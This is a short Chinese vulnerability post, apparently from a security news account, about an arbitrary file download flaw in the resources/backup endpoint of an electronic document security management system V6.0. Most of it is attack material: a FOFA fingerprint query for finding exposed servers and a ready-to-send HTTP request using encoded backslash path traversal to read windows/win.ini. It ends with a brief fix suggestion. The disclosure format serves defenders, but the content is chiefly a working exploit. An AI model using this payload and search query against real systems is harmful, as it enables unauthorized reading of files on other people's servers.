电子文档安全管理系统V6.0接口backup存在任意文件下载漏洞
免责声明:本号提供的网络安全信息仅供参考,不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我联系,我将尽快处理并删除相关内容。
漏洞描述
电子文档安全管理系统 V6.0 resources/backup存在任意文件下载漏洞,攻击者可通过该漏洞获取服务器所有文件信息。
搜索语法
FOFA:body="docsafe/docsafe.nocache.js"
漏洞再现
GET /resources/backup//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1
Host:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
修复建议
禁用特殊字符,限制文件读取路径。关注厂商官网信息,及时更新版本